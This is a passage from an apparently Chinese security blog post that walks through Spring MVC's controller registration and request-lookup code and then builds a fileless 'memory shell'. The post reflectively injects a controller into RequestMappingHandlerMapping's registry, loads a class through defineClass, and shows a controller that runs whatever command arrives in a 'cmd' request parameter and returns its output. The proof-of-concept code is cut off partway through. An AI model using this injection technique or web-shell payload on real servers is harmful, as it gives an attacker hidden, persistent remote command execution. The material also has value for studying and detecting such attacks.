<p>这里添加了@RestController注解来标识一个Controller，下面就是通过@RequestMapping来声明请求路径</p>
<h4 id="Controller-注册流程"><a href="#Controller-注册流程" class="headerlink" title="Controller 注册流程"></a>Controller 注册流程</h4><p>首先在RequestMappingHandlerMapping#afterPropertiesSet方法里面，先创建了一个RequestMappingInfo用来存储信息</p>
<p><img src="/images/spring7.png" width="100%" height="80%"></p>
<p>而后调用了父类AbstractHandlerMethodMapping#afterPropertiesSet方法，到initHandlerMethods方法</p>
<p><img src="/images/spring8.png" width="100%" height="80%"></p>
<p><img src="/images/spring9.png" width="100%" height="80%"></p>
<p>下面又到了processCandidateBean来获取beantype，里面调用的isHandler方法用来判断当前类是否带有 @Controller 或 @RequestMapping 注解</p>
<p><img src="/images/spring10.png" width="100%" height="80%"></p>
<p><img src="/images/spring11.png" width="100%" height="80%"></p>
<p>后面到达AbstractHandlerMethodMapping#detectHandlerMethods，这里先是获取beanName属性，设定到一个具体的Controller</p>
<p><img src="/images/spring12.png" width="100%" height="80%"></p>
<p>在AbstractHandlerMethodMapping#detectHandlerMethods方法里面先是获取对应类的class文件</p>
<p><img src="/images/spring13.png" width="100%" height="80%"></p>
<p>接着使用 MethodIntrospector.selectMethods() 通过反射扫描类中的所有方法，过滤出有请求映射的处理方法</p>
<p>在AbstractHandlerMethodMapping#detectHandlerMethods中调用了getMappingForMethod，该方法会返回一个 RequestMappingInfo 对象，这个对象包含了 RequestMapping 的基本信息</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> RequestMappingInfo <span class="title function_">getMappingForMethod</span><span class="params">(Method method, Class&lt;?&gt; handlerType)</span> &#123;</span><br><span class="line">    <span class="type">RequestMappingInfo</span> <span class="variable">info</span> <span class="operator">=</span> createRequestMappingInfo(method);</span><br><span class="line">    <span class="keyword">if</span> (info != <span class="literal">null</span>) &#123;</span><br><span class="line">       <span class="type">RequestMappingInfo</span> <span class="variable">typeInfo</span> <span class="operator">=</span> createRequestMappingInfo(handlerType);</span><br><span class="line">       <span class="keyword">if</span> (typeInfo != <span class="literal">null</span>) &#123;</span><br><span class="line">          info = typeInfo.combine(info);</span><br><span class="line">       &#125;</span><br><span class="line">       <span class="type">String</span> <span class="variable">prefix</span> <span class="operator">=</span> getPathPrefix(handlerType);</span><br><span class="line">       <span class="keyword">if</span> (prefix != <span class="literal">null</span>) &#123;</span><br><span class="line">          info = RequestMappingInfo.paths(prefix).options(<span class="built_in">this</span>.config).build().combine(info);</span><br><span class="line">       &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> info;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><img src="/images/spring14.png" width="100%" height="80%"></p>
<p>最后通过registerHandlerMethod方法来实现映射到URL里面，最终到达AbstractHandlerMethodMapping#registerHandlerMethod里面，再进入register其实就是完成了一些数据的封装、属性的赋值</p>
<p><img src="/images/spring15.png" width="100%" height="80%"></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">register</span><span class="params">(T mapping, Object handler, Method method)</span> &#123;</span><br><span class="line">    <span class="built_in">this</span>.readWriteLock.writeLock().lock();</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">       <span class="type">HandlerMethod</span> <span class="variable">handlerMethod</span> <span class="operator">=</span> createHandlerMethod(handler, method);</span><br><span class="line">       validateMethodMapping(handlerMethod, mapping);</span><br><span class="line"></span><br><span class="line">       Set&lt;String&gt; directPaths = AbstractHandlerMethodMapping.<span class="built_in">this</span>.getDirectPaths(mapping);</span><br><span class="line">       <span class="keyword">for</span> (String path : directPaths) &#123;</span><br><span class="line">          <span class="built_in">this</span>.pathLookup.add(path, mapping);</span><br><span class="line">       &#125;</span><br><span class="line"></span><br><span class="line">       <span class="type">String</span> <span class="variable">name</span> <span class="operator">=</span> <span class="literal">null</span>;</span><br><span class="line">       <span class="keyword">if</span> (getNamingStrategy() != <span class="literal">null</span>) &#123;</span><br><span class="line">          name = getNamingStrategy().getName(handlerMethod, mapping);</span><br><span class="line">          addMappingName(name, handlerMethod);</span><br><span class="line">       &#125;</span><br><span class="line"></span><br><span class="line">       <span class="type">CorsConfiguration</span> <span class="variable">corsConfig</span> <span class="operator">=</span> initCorsConfiguration(handler, method, mapping);</span><br><span class="line">       <span class="keyword">if</span> (corsConfig != <span class="literal">null</span>) &#123;</span><br><span class="line">          corsConfig.validateAllowCredentials();</span><br><span class="line">          <span class="built_in">this</span>.corsLookup.put(handlerMethod, corsConfig);</span><br><span class="line">       &#125;</span><br><span class="line"></span><br><span class="line">       <span class="built_in">this</span>.registry.put(mapping,</span><br><span class="line">             <span class="keyword">new</span> <span class="title class_">MappingRegistration</span>&lt;&gt;(mapping, handlerMethod, directPaths, name, corsConfig != <span class="literal">null</span>));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">finally</span> &#123;</span><br><span class="line">       <span class="built_in">this</span>.readWriteLock.writeLock().unlock();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>接口 InitializingBean#afterPropertiesSet() 用来实现 bean 的初始化，RequestMappingHandlerMapping 是它的实现类，下面就是创建流程</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">RequestMappingHandlerMapping#afterPropertiesSet()</span><br><span class="line">AbstractHandlerMethodMapping#afterPropertiesSet()</span><br><span class="line">AbstractHandlerMethodMapping#initHandlerMethods()</span><br><span class="line">AbstractHandlerMethodMapping#processCandidateBean(String)</span><br><span class="line">        -&gt; RequestMappingHandlerMapping#isHandler(Class&lt;?&gt;) # 判断当前类是否带有 <span class="meta">@Controller</span> 或 <span class="meta">@RequestMapping</span> 注解</span><br><span class="line">        -&gt; AbstractHandlerMethodMapping#detectHandlerMethods(Object)</span><br><span class="line">                -&gt; RequestMappingHandlerMapping#getMappingForMethod(Method, Class&lt;?&gt;) # 获取注解相关信息</span><br><span class="line">                -&gt; AbstractHandlerMethodMapping#registerHandlerMethod(Object, Method, T)</span><br><span class="line">                   AbstractHandlerMethodMapping$MappingRegistry#register(T, Object, Method) # 注册注解相关信息</span><br></pre></td></tr></table></figure>
<h4 id="查找流程简单分析"><a href="#查找流程简单分析" class="headerlink" title="查找流程简单分析"></a>查找流程简单分析</h4><p>将断点放到controller中，这样就可以看到完整的调用栈</p>
<p><img src="/images/spring16.png" width="100%" height="80%"></p>
<p>这里直接来到doGet方法里面看吧，在doGet方法的前面调用是通过service来接收客户端发送的请求部分，但是还不是真正的处理逻辑</p>
<p><img src="/images/spring17.png" width="100%" height="80%"></p>
<p>在doGet方法里面返回了processRequest(request, response)</p>
<p><img src="/images/spring18.png" width="100%" height="80%"></p>
<p>然后就是将request, response方法传递，直到来到AbstractHandlerMethodAdapter#handle里面多添加了一个参数handle</p>
<p><img src="/images/spring19.png" width="100%" height="80%"></p>
<p>简单看看里面封装了什么,这里面封装了对应路由下需要调用的方法，下面就可以去找找看handle是如何被创建的，我们也好进行注册</p>
<p><img src="/images/spring20.png" width="100%" height="80%"></p>
<p>主要看前一个调用DispatcherServlet#doDispatch里面，它的mappedHandler.getHandler()便是由来</p>
<p><img src="/images/spring21.png" width="100%" height="80%"></p>
<p>而如果直接看getHandler方法，这里就直接返回了handler属性,所以还得看mappedHandler属性的封装</p>
<p><img src="/images/spring22.png" width="100%" height="80%"></p>
<p>来到这里进行跟进DispatcherServlet#getHandler在往下</p>
<p><img src="/images/spring23.png" width="100%" height="80%"></p>
<p><img src="/images/spring24.png" width="100%" height="80%"></p>
<p>其实在DispatcherServlet#getHandler里面就可以了因为它后续的处理就是通过RequestMappingHandlerMapping类来进一步处理获取，后续的操作就是通过获取客户端请求的path来知道handle对象，继续简单分析一下</p>
<p>在AbstractHandlerMapping#getHandler方法里面就已经创建成功了，需要跟进getHandlerInternal方法看它是如何通过request对象来找到对应的方法</p>
<p><img src="/images/spring25.png" width="100%" height="80%"></p>
<p>一直到AbstractHandlerMethodMapping的getHandlerInternal方法里面，先是获取请求的路由，比如这里是/say1</p>
<p><img src="/images/spring26.png" width="100%" height="80%"></p>
<p>接下来就是对mappingRegistry上了读锁，而mappingRegistry属性里面的registry就已经将映射关系写好了</p>
<p><img src="/images/spring27.png" width="100%" height="80%"></p>
<p>接下来又到了AbstractHandlerMethodMapping#lookupHandlerMethod方法里面，这里有一个ArrayList对象 matches 里面应该就是用来存放处理方法的信息</p>
<p><img src="/images/spring28.png" width="100%" height="80%"></p>
<p>我们需要多注意matches对象参加的方法，因为在最后它里面就定位到了我们的实现类的对应方法，其实就是在AbstractHandlerMethodMapping#addMatchingMappings里面</p>
<p><img src="/images/spring29.png" width="100%" height="80%"></p>
<p>关键就在这里了,就不继续研究如何将指放到registry这个hashMap类里面了</p>
<p><img src="/images/spring30.png" width="100%" height="80%"></p>
<p><img src="/images/spring31.png" width="100%" height="80%"></p>
<p>这里其实只需要创建一个恶意的Controller放到RequestMappingInfo对象进行封装，并将其放到RequestMappingHandlerMapping里面就可以了，这里就模仿了spring将我们的创建的Controller通过创建RequestMappingInfo中进行标识</p>
<p>RequestMappingHandlerMapping是springMVC里面的核心Bean，而对于bean的管理，我们可以通过ApplicationContext来实现，正如yyjccc师傅所说</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">在SpringMVC框架下，会有两个ApplicationContext，一个是Spring IOC的上下文，这个是在java web框架的Listener里面配置，就是我们经常用的web.xml里面的org.springframework.web.context.ContextLoaderListener，由它来完成IOC容器的初始化和bean对象的注入。</span><br><span class="line">另外一个是ApplicationContext是由org.springframework.web.servlet.DispatcherServlet完成的，具体是在org.springframework.web.servlet.FrameworkServlet#initWebApplicationContext()这个方法做的。而这个过程里面会完成RequestMappingHandlerMapping这个对象的初始化。</span><br></pre></td></tr></table></figure>
<p>在新一点的Spring版本里面就可以直接通过注解来实现上面的映射功能，无需写入配置文件，大致的流程就是通过先创建好RequestMappingInfo，再是通过request来进行匹配，根据mappingRegistry的register属性创建一个handler</p>
<h4 id="动态注册实现"><a href="#动态注册实现" class="headerlink" title="动态注册实现"></a>动态注册实现</h4><p>在Spring 4.0及以后，可以使用registerMapping直接注册requestMapping，对于ApplicationContext具体获取哪个，这里是spring下，默认是通过WebApplicationContext来实现上下文，所以创建流程如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">获取context</span><br><span class="line">获取RequestMappingHandlerMapping</span><br><span class="line">反射拿到要调用的方法</span><br><span class="line">创建RequestMappingInfo，对应着一个Controller</span><br><span class="line">注册进入RequestMappingHandlerMapping</span><br></pre></td></tr></table></figure>
<p>在Spring中默认的上下文为WebApplicationContext，其获取的方法和Tomcat的上下文不一样，这里往下就说四种方式获取，还其实可以通过在Tomcat内存马部分最后的获取方法，通过获取对应线程来获取对应对象</p>
<p>1 getCurrentWebApplicationContext</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">WebApplicationContext</span> <span class="variable">context</span> <span class="operator">=</span> ContextLoader.getCurrentWebApplicationContext();</span><br></pre></td></tr></table></figure>
<p>getCurrentWebApplicationContext 获得的是一个 XmlWebApplicationContext 实例类型的 Root WebApplicationContext。</p>
<p>2 WebApplicationContextUtils</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">WebApplicationContext</span> <span class="variable">context</span> <span class="operator">=</span> WebApplicationContextUtils.getWebApplicationContext(RequestContextUtils.getWebApplicationContext(((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getRequest()).getServletContext());</span><br><span class="line"></span><br><span class="line"><span class="type">WebApplicationContext</span> <span class="variable">context</span> <span class="operator">=</span> WebApplicationContextUtils.getWebApplicationContext(RequestContextUtils.findWebApplicationContext(((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes()).getRequest()).getServletContext());</span><br></pre></td></tr></table></figure>
<p>3 RequestContextUtils</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">WebApplicationContext</span> <span class="variable">webApplicationContext</span> <span class="operator">=</span> RequestContextUtils.findWebApplicationContext(((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest());</span><br></pre></td></tr></table></figure>
<p>4 getAttribute</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">WebApplicationContext</span> <span class="variable">context3</span> <span class="operator">=</span> (WebApplicationContext)RequestContextHolder.currentRequestAttributes().getAttribute(<span class="string">&quot;org.springframework.web.servlet.DispatcherServlet.CONTEXT&quot;</span>, <span class="number">0</span>);</span><br></pre></td></tr></table></figure>
<p>下面是内存马的具体实现(这里主要是由su18师傅的poc来)</p>
<p>首先创建一个恶意的Controller容器</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">test1Controller</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@RequestMapping(&quot;/aaa&quot;)</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">aaa</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="comment">//实现主体</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>首先获取context类，</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//实现获取对应的Context，方便后续对RequestMappingHandlerMapping进行操作</span></span><br><span class="line"><span class="type">WebApplicationContext</span> <span class="variable">webApplicationContext</span> <span class="operator">=</span> RequestContextUtils.findWebApplicationContext(((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest());</span><br></pre></td></tr></table></figure>
<p>下一步获取RequestMappingHandlerMapping对象，这里需要作用是获取上下文中的而不是直接创建一个新的RequestMappingHandlerMapping对象，不然就无法实现获取上下文里面的mappingRegister属性，那么要如何获取呢，具体就需要通过context的getBean来获取</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//这种是错误的方法 RequestMappingHandlerMapping RequestMapping=new RequestMappingHandlerMapping();</span></span><br><span class="line">RequestMappingHandlerMapping RequestMapping1=webApplicationContext.getBean(RequestMappingHandlerMapping.class);</span><br></pre></td></tr></table></figure>
<p>下面就是获取mappingRegister属性的过程，这里的mappingRegister属性是在AbstractHandlerMethodMapping里面被声明，它是RequestMappingHandlerMapping的父类RequestMappingInfoHandlerMapping的父类AbstractHandlerMethodMapping，所以这里就需要通过两次获取父类再获取mappingRegister属性，具体的实现只能通过反射获取对应属性，这里也是一样要与上下文相关联</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 获取父类的 MappingRegistry 属性</span></span><br><span class="line"><span class="type">Field</span> <span class="variable">f</span> <span class="operator">=</span> RequestMapping.getClass().getSuperclass().getSuperclass().getDeclaredField(<span class="string">&quot;mappingRegistry&quot;</span>);</span><br><span class="line">f.setAccessible(<span class="literal">true</span>);</span><br><span class="line"><span class="type">Object</span> <span class="variable">mappingRegistry</span> <span class="operator">=</span> f.get(RequestMapping);</span><br></pre></td></tr></table></figure>
<p>下面就是反射调用AbstractHandlerMethodMapping内部类的register方法来将恶意的内存马放入mappingRegister属性中</p>
<p><img src="/images/spring32.png" width="100%" height="80%"></p>
<p>这里不能直接通过反射获取的 MappingRegistry 属性来直接调用，需要通过反射获取其方法进行调用</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//反射获取内部类</span></span><br><span class="line">Class&lt;?&gt; c = Class.forName(<span class="string">&quot;org.springframework.web.servlet.handler.AbstractHandlerMethodMapping$MappingRegistry&quot;</span>);</span><br><span class="line"><span class="comment">//获取其中所有的方法</span></span><br><span class="line">Method[] ms = c.getDeclaredMethods();</span><br></pre></td></tr></table></figure>
<p>下面就是恶意内存马实现部分，如下图信息</p>
<p><img src="/images/spring33.png" width="100%" height="80%"></p>
<p>这里需要注意一点在创建一个url访问路径是由于不同的Spring版本在处理路径匹配上有差异，在 Springboot 2.6.0 版本前可以通过下面的方式来直接创建PatternsRequestCondition写入mappinginfo</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//创建一个访问路径</span></span><br><span class="line"><span class="type">PatternsRequestCondition</span> <span class="variable">url</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">PatternsRequestCondition</span>(<span class="string">&quot;/su18&quot;</span>);</span><br><span class="line"><span class="comment">//最后整合为一个mapping</span></span><br><span class="line"><span class="type">RequestMappingInfo</span> <span class="variable">info</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">RequestMappingInfo</span>(url, <span class="keyword">new</span> <span class="title class_">RequestMethodsRequestCondition</span>(), <span class="literal">null</span>, <span class="literal">null</span>, <span class="literal">null</span>, <span class="literal">null</span>, <span class="literal">null</span>);</span><br></pre></td></tr></table></figure>
<p>但是在Springboot 2.6.0 版本开始就不一样了，他改变了匹配方法，导致在直接创建注入就会路径不匹配，导致其error注入不成功，解决方法就是通过直接反射获取对应的属性再进行添加</p>
<p><img src="/images/spring34.png" width="100%" height="80%"></p>
<p>下面是新版本的实现方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Field</span> <span class="variable">configField</span> <span class="operator">=</span> mapping.getClass().getDeclaredField(<span class="string">&quot;config&quot;</span>);</span><br><span class="line">configField.setAccessible(<span class="literal">true</span>);</span><br><span class="line">RequestMappingInfo.<span class="type">BuilderConfiguration</span> <span class="variable">config</span> <span class="operator">=</span> (RequestMappingInfo.BuilderConfiguration) configField.get(mapping);</span><br><span class="line"><span class="type">RequestMappingInfo</span> <span class="variable">info</span> <span class="operator">=</span> RequestMappingInfo.paths(<span class="string">&quot;/luokuang&quot;</span>).options(config).build();</span><br></pre></td></tr></table></figure>
<p>这里先看看变化</p>
<p>首先是在新版本下的info信息，这里是直接通过PathPatternsRequestCondition来解决匹配问题</p>
<p><img src="/images/spring35.png" width="100%" height="80%"></p>
<p>而对于旧版本着还是以PatternRequestCondition来实现匹配</p>
<p><img src="/images/spring36.png" width="100%" height="80%"></p>
<p>这个差异也就导致了我们需要通过不同的方法来实现对于匹配问题的解决</p>
<p>下面就是最后一步通过调用register方法将RequestMappingInfo的信息注入到mappingRegister属性里面</p>
<p>前面反射获取所有方法下面就是调用过程，myClass就是我们的字节码文件的class文件</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> (Method method : ms) &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="string">&quot;register&quot;</span>.equals(method.getName())) &#123;</span><br><span class="line">        <span class="comment">// 反射调用 MappingRegistry 的 register 方法注册 TestController 的 index</span></span><br><span class="line">        method.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        method.invoke(mappingRegistry, info, myClass.newInstance(), myClass.getMethods()[<span class="number">0</span>]);</span><br><span class="line">        response.getWriter().println(<span class="string">&quot;spring controller add&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>而获取class的方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> Class&lt;?&gt; getclass() <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">    <span class="type">ClassLoader</span> <span class="variable">loader</span> <span class="operator">=</span> Thread.currentThread().getContextClassLoader();</span><br><span class="line">    <span class="type">byte</span>[] bytes = Files.readAllBytes(Paths.get(<span class="string">&quot;D://java/TestController.class&quot;</span>));;</span><br><span class="line">    <span class="type">Method</span> <span class="variable">method</span> <span class="operator">=</span> <span class="literal">null</span>;</span><br><span class="line">    Class&lt;?&gt; clz = loader.getClass();</span><br><span class="line">    <span class="keyword">while</span> (method == <span class="literal">null</span> &amp;&amp; clz != Object.class) &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            method = clz.getDeclaredMethod(<span class="string">&quot;defineClass&quot;</span>, <span class="type">byte</span>[].class, <span class="type">int</span>.class, <span class="type">int</span>.class);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (NoSuchMethodException ex) &#123;</span><br><span class="line">            clz = clz.getSuperclass();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (method != <span class="literal">null</span>) &#123;</span><br><span class="line">        method.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        <span class="keyword">return</span> (Class&lt;?&gt;) method.invoke(loader, bytes, <span class="number">0</span>, bytes.length);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>TestController.class的内容为下面的代码，这里也可以替换为执行命令的代码，但是这里要注意一点对于@RequestMapping注解的声明没有作用，就是由于匹配机制的改变，所以还是上面的bash路由</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Controller</span></span><br><span class="line"><span class="meta">@RequestMapping(&quot;/luokuang&quot;)</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">TestController</span> &#123;</span><br><span class="line">    <span class="meta">@GetMapping</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">index</span><span class="params">(HttpServletRequest request, HttpServletResponse response)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">String</span> <span class="variable">output</span> <span class="operator">=</span> <span class="string">&quot;yes&quot;</span>;</span><br><span class="line">        response.getWriter().write(output);</span><br><span class="line">        <span class="type">InputStream</span> <span class="variable">in</span> <span class="operator">=</span> Runtime.getRuntime().exec(request.getParameter(<span class="string">&quot;cmd&quot;</span>)).getInputStream();</span><br><span class="line">        <span class="type">Scanner</span> <span class="variable">s</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Scanner</span>(in).useDelimiter(<span class="string">&quot;\\A&quot;</span>);</span><br><span class="line">        <span class="type">String</span> <span class="variable">output1</span> <span class="operator">=</span> s.hasNext() ? s.next() : <span class="string">&quot;&quot;</span>;</span><br><span class="line">        response.getWriter().write(output1);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>最后poc为</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@Controller</span></span><br><span class="line"><span class="meta">@RequestMapping(value = &quot;/add&quot;)</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">AddController</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> Class&lt;?&gt; getclass() <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        <span class="type">ClassLoader</span> <span class="variable">loader</span> <span class="operator">=</span> Thread.currentThread().getContextClassLoader();</span><br><span class="line">        <span class="type">byte</span>[] bytes = Files.readAllBytes(Paths.get(<span class="string">&quot;D://java/TestController.class&quot;</span>));;</span><br><span class="line">        <span class="type">Method</span> <span class="variable">method</span> <span class="operator">=</span> <span class="literal">null</span>;</span><br><span class="line">        Class&lt;?&gt; clz = loader.getClass();</span><br><span class="line">        <span class="keyword">while</span> (method == <span class="literal">null</span> &amp;&amp; clz != Object.class) &#123;</span><br><span class="line">            <span class="keyword">try</span> &#123;</span><br><span class="line">                method = clz.getDeclaredMethod(<span class="string">&quot;defineClass&quot;</span>, <span class="type">byte</span>[].class, <span class="type">int</span>.class, <span class="type">int</span>.class);</span><br><span class="line">            &#125; <span class="keyword">catch</span> (NoSuchMethodException ex) &#123;</span><br><span class="line">                clz = clz.getSuperclass();</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (method != <span class="literal">null</span>) &#123;</span><br><span class="line">            method.setAccessible(<span class="literal">true</span>);</span><br><span class="line">            <span class="keyword">return</span> (Class&lt;?&gt;) method.invoke(loader, bytes, <span class="number">0</span>, bytes.length);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@GetMapping()</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">index</span><span class="params">(HttpServletRequest request, HttpServletResponse response)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">final</span> <span class="type">String</span> <span class="variable">controllerPath</span> <span class="operator">=</span> <span class="string">&quot;/su18&quot;</span>;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 获取当前应用上下文</span></span><br><span class="line">        <span class="type">WebApplicationContext</span> <span class="variable">context</span> <span class="operator">=</span> RequestContextUtils.findWebApplicationContext(((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest());</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 通过 context 获取 RequestMappingHandlerMapping 对象</span></span><br><span class="line">        <span 